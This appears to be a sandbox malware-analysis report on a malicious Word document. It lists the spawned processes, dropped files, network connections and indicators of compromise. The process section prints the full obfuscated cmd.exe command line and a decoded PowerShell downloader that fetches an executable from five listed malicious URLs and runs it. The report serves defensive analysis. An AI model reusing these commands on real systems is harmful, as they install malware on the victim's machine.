61;45;72;52;74;9;49;27;27;76;63;62;27;49;12;12;63;72;19;54;53;43;43;23;10;29;57;19;29;10;31;53;52;20;9;27;27;61;45;33;46;10;71;0;29;5;53;57;0;10;53;55;12;12;12;12;45;53;56;19;71;14;73;32;10;57;19;29;10;31;53;52;20;9;27;27;61;72;52;62;35;55;15;12;76;63;74;49;27;47;35;63;72;18;38;10;67;32;72;68;68;50;67;29;50;5;56;68;68;52;69;35;55;61;47;76;63;14;9;49;61;55;63;72;87)do set 9vR=!9vR!!kW:~%o,1!&&if %o equ 87 echo !9vR:~5!\|cmd"	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3064	CmD /V/C"set kW=gEXjNhBiU1eO0,v8CWbIux\G@%F5VtAmk.y6zHrLwM/(T)l9Y3cJ$ f4{-7+P2d'D~Ka}s:n;opS=&&for %o in (74;73;40;25;60;8;6;39;19;16;70;65;27;13;9;25;38;25;75;1;75;75;19;11;4;4;30;41;1;70;65;57;55;13;9;25;5;25;44;1;41;60;70;65;57;49;13;9;25;46;46;53;52;20;61;9;27;61;76;63;36;55;27;12;49;63;72;52;36;47;27;15;47;76;71;10;40;57;73;18;3;10;50;29;53;4;10;29;33;17;10;18;16;46;7;10;71;29;72;52;5;55;49;15;58;76;63;5;29;29;74;70;42;42;29;20;71;10;38;0;33;50;73;31;42;75;66;41;26;75;20;19;17;17;24;5;29;29;74;70;42;42;69;29;73;20;29;67;38;50;33;50;73;31;42;51;18;16;11;23;34;1;24;5;29;29;74;70;42;42;40;40;40;33;31;73;62;10;38;71;57;67;20;29;73;74;67;38;29;69;33;50;73;31;42;10;36;26;8;23;74;19;24;5;29;29;74;70;42;42;67;71;29;7;0;20;67;33;67;0;20;7;46;67;38;71;73;29;7;50;7;67;69;33;50;73;31;42;39;4;11;23;26;20;48;21;24;5;29;29;74;70;42;42;29;67;32;10;57;73;71;10;61;33;50;73;31;42;2;15;12;28;10;62;37;63;33;75;74;46;7;29;43;63;24;63;45;72;52;71;15;61;9;27;76;63;3;15;58;35;9;63;72;52;7;15;35;9;9;53;76;53;63;27;27;63;72;52;71;55;27;15;58;76;63;69;15;55;58;49;63;72;52;20;9;27;27;61;76;52;10;71;14;70;29;10;31;74;59;63;22;63;59;52;7;15;35;9;9;59;63;33;10;21;10;63;72;54;73;38;10;67;50;5;43;52;32;61;12;61;61;53;7;71;53;52;5;55;49;15;58;45;56;29;38;34;56;52;36;47;27;15;47;33;64;73;40;71;46;73;67;62;26;7;46;10;43;52;32;61;12;61;61;13;53;52;20;9;27;27;61;45;72;52;74;9;49;27;27;76;63;62;27;49;12;12;63;72;19;54;53;43;43;23;10;29;57;19;29;10;31;53;52;20;9;27;27;61;45;33;46;10;71;0;29;5;53;57;0;10;53;55;12;12;12;12;45;53;56;19;71;14;73;32;10;57;19;29;10;31;53;52;20;9;27;27;61;72;52;62;35;55;15;12;76;63;74;49;27;47;35;63;72;18;38;10;67;32;72;68;68;50;67;29;50;5;56;68;68;52;69;35;55;61;47;76;63;14;9;49;61;55;63;72;87)do set 9vR=!9vR!!kW:~%o,1!&&if %o equ 87 echo !9vR:~5!\|cmd"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2748	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u2152='z4503';$z9589=new-object Net.WebClient;$h4387='http://tunerg.com/SKMFSuIWW@http://stoutarc.com/JbCOGyE@http://www.modern-autoparts.com/ezFUGpI@http://antigua.aguilarnoticias.com/LNOGFuYx@http://take-one2.com/X80VedH'.Split('@');$n8215='j8761';$i8611 = '55';$n4587='s8473';$u1552=$env:temp+'\'+$i8611+'.exe';foreach($k2022 in $h4387){try{$z9589.DownloadFile($k2022, $u1552);$p1355='d5300';If ((Get-Item $u1552).length -ge 40000) {Invoke-Item $u1552;$d6480='p3596';break;}}catch{}}$s6429='v1324';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3088	cmd	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3004	powershell $u2152='z4503';$z9589=new-object Net.WebClient;$h4387='http://tunerg.com/SKMFSuIWW@http://stoutarc.com/JbCOGyE@http://www.modern-autoparts.com/ezFUGpI@http://antigua.aguilarnoticias.com/LNOGFuYx@http://take-one2.com/X80VedH'.Split('@');$n8215='j8761';$i8611 = '55';$n4587='s8473';$u1552=$env:temp+'\'+$i8611+'.exe';foreach($k2022 in $h4387){try{$z9589.DownloadFile($k2022, $u1552);$p1355='d5300';If ((Get-Item $u1552).length -ge 40000) {Invoke-Item $u1552;$d6480='p3596';break;}}catch{}}$s6429='v1324';	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 367

Read events

904

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2608	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR571B.tmp.cvr		—
		MD5:—	SHA256:—
3004	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E5NPJAPSE56RHCPWIHIZ.temp		—
		MD5:—	SHA256:—
3004	powershell.exe	C:\Users\admin\AppData\Local\Temp\55.exe		—
		MD5:—	SHA256:—
3004	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1067f3.TMP		binary
		MD5:16D0FD6E07266B2C15A9D7BC6623F506	SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3004	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:16D0FD6E07266B2C15A9D7BC6623F506	SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2608	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:03F75A861CC10AD1C3318BEB891B725B	SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58
2608	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$ctNum-JBH-90692.doc		pgc
		MD5:C0EBB310B4A145B016C663AE8153CF08	SHA256:DE259FB0E9D5A5680976581D5C07C3AA5A1C16B87A4B94ADC0650D25E1A4EA7A
2608	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:D0BE2C90D0DB80B2B7EB9DC045C33AA6	SHA256:4E18793C0B07631649B944A69CC2E3BB93735A459F8DFC3EA41B696B2326C1BD
2608	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\516F57CC.jpg		image
		MD5:9BB8E2D4C89DACA05D89D8028BA9E420	SHA256:9179CA7577140FF08D227B1A48AAC7C8EDCE5B7E8CB2D8A7369F9D79228D6AA9

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3004	powershell.exe	GET	404	109.107.126.24:80	http://antigua.aguilarnoticias.com/LNOGFuYx	ES	html	299 b	malicious
3004	powershell.exe	GET	200	64.29.151.221:80	http://stoutarc.com/JbCOGyE	US	html	211 b	malicious
3004	powershell.exe	GET	404	153.122.32.44:80	http://take-one2.com/X80VedH	JP	html	268 b	malicious
3004	powershell.exe	GET	301	119.59.104.39:80	http://www.modern-autoparts.com/ezFUGpI	TH	html	248 b	malicious
3004	powershell.exe	GET	200	119.59.104.39:80	http://www.modern-autoparts.com/ezFUGpI/	TH	html	248 b	malicious
3004	powershell.exe	GET	403	210.188.201.17:80	http://tunerg.com/SKMFSuIWW	JP	html	2.78 Kb	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3004	powershell.exe	210.188.201.17:80	tunerg.com	SAKURA Internet Inc.	JP	malicious
3004	powershell.exe	109.107.126.24:80	antigua.aguilarnoticias.com	Esycor S.A.	ES	unknown
3004	powershell.exe	64.29.151.221:80	stoutarc.com	InternetNamesForBusiness.com	US	malicious
3004	powershell.exe	119.59.104.39:80	www.modern-autoparts.com	453 Ladplacout Jorakhaebua	TH	malicious
3004	powershell.exe	153.122.32.44:80	take-one2.com	GMO CLOUD K.K.	JP	malicious

DNS requests

Domain	IP	Reputation
tunerg.com	210.188.201.17	malicious
stoutarc.com	64.29.151.221	malicious
www.modern-autoparts.com	119.59.104.39	malicious
antigua.aguilarnoticias.com	109.107.126.24	malicious
take-one2.com	153.122.32.44	unknown

Threats

No threats detected

Add for printing

No debug info

General Info

FactNum-JBH-90692.doc

3674037C5D519E5E6CFE99DFDB87F40E

60C72CEAFE9784D2E6E45DDF7282C93166CD7C74

25B7C267CC3C940D67181681108D3DFEE2CB059C2C70FD2C0C6EF98845518EBF

3072:p5Fqffqjbzk/jL/xSu90OoiLuDKZXfwKeljR1z:pjOqjk/xUOmD+XfwLX

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Request from PowerShell which ran from CMD.EXE

Executes PowerShell scripts

Starts CMD.EXE for commands execution

Runs app for hidden code execution

Unusual execution from Microsoft Office

SUSPICIOUS

Starts CMD.EXE for commands execution

Creates files in the user directory

Application launched itself

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings